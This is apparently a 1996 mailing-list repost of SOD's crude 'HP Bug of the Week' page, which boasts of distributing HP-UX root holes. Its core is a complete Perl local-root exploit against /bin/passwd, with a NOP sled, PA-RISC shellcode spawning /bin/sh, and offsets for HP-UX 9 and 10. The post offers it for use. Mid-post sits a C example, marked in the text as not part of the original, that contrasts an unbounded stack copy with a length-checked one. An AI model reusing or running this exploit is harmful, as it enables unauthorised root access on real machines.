HP Bug of the Week!

Aleph One (aleph1@dfw.net)
Sat, 23 Nov 1996 08:19:34 -0600

you are easily offended:

   This week: If I had a life, I wouldn't spend my Friday nights giving
   you bugs

   Good fuckin' day, eh? Welcome to the HP Bug of the Week -- if you
   haven't come here looking for security holes to HP/UX computers,
   you've come to the wrong fucking place. Otherwise look no further
   because you've found the fuckin' mecca of the fuckin' desert. Our goal
   here is to distribute those HP bugeridoo's as far and wide as is
   fucking humanly possible, so tell a friend if you have one. We've got
   a root hole from a buffer overrun in /bin/passwd this week, plus a
   whole new section called "Other Folks Scripts" that rakes in the
   wonderful works of other net.scriptors. So come on in, look around,
   take all you want but eat all you take and as always, start clicking
   your way to root access with scripts from the motherfuckin' folks at
   SOD.

   Vulgarity rating: 6 (scalawag)

Caveat Emptor

   passwd is broked script for this week

#!/usr/bin/perl

# SOD /bin/passwd buffer overrun

use FileHandle;

# h2cs: turn a string of hex digit pairs into the raw bytes they encode
sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
  }
  return $rv;
}

# pick the middle field of `uname -r` as the HP-UX major release
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;

if ($rev eq "10") {
  $offset=2102;
  $prealign="AA"; # 2 byte pre
  $postalign=""; # 0 byte post
  $pcoq=h2cs("7b03b463");
} else {
  $offset=2170; # 2170 works for 9.X...
  $prealign=""; # zero byte pre
  $postalign="PP"; # 2 byte post
  $pcoq=h2cs("7b033018");
}

$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg1,arg1,arg1
$code.=h2cs("0b180298"); # XOR arg2,arg2,arg2
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff

$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/bin/passwd","$of");
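The hole the script drives is the classic one: a command-line argument copied into a fixed-size stack buffer with no length check, so an over-long argument runs past the buffer. The C below is an added illustration of that bug class from the fixing side, not HP-UX's passwd source and not part of the original post; NAME_MAX_LEN, unsafe_take_name, safe_take_name, argument_fits and rejects_length are this example's own names, and the buffer size is a constructed value.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed buffer size for the illustration (not a value from HP-UX). */
#define NAME_MAX_LEN 64

/* Length of s, but never looking past `limit` bytes. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Vulnerable pattern: the argument is copied into a fixed stack buffer with
 * no bound, so an argument of NAME_MAX_LEN bytes or more overwrites whatever
 * sits above the buffer on the stack. Kept only for contrast; never call it
 * with untrusted input. */
int unsafe_take_name(const char *arg)
{
    char name[NAME_MAX_LEN];
    strcpy(name, arg);            /* overruns when strlen(arg) >= NAME_MAX_LEN */
    return (int)strlen(name);
}

/* Hardened form: measure with a bound, refuse anything that does not fit,
 * then copy exactly the bytes measured. Returns the copied length, or -1. */
int safe_take_name(const char *arg)
{
    char name[NAME_MAX_LEN];
    size_t n = bounded_len(arg, NAME_MAX_LEN);
    if (n >= NAME_MAX_LEN)
        return -1;                /* too long: reject instead of overflowing */
    memcpy(name, arg, n + 1);     /* n + 1 copies the terminating NUL too */
    return (int)n;
}

/* Argument validation a setuid program (or a wrapper around it) can apply
 * before any copy: 1 if arg has at most `limit` bytes, else 0. */
int argument_fits(const char *arg, size_t limit)
{
    return bounded_len(arg, limit + 1) <= limit;
}

/* Build a constructed argument of `len` 'A' bytes and report whether the
 * hardened path rejects it (1 = rejected, 0 = accepted, -1 = no memory). */
int rejects_length(size_t len)
{
    char *arg = malloc(len + 1);
    int rejected;
    if (arg == NULL)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rejected = (safe_take_name(arg) == -1);
    free(arg);
    return rejected;
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : "alice";
    if (!argument_fits(arg, NAME_MAX_LEN - 1)) {
        fprintf(stderr, "argument too long (limit %d bytes)\n", NAME_MAX_LEN - 1);
        return 1;
    }
    printf("accepted %d bytes\n", safe_take_name(arg));
    return 0;
}
```

The point of bounded_len is that the length check itself must not read past the buffer's worth of input; strlen on an attacker-sized argument is safe, but a bounded scan is the habit that also covers non-terminated data.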

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01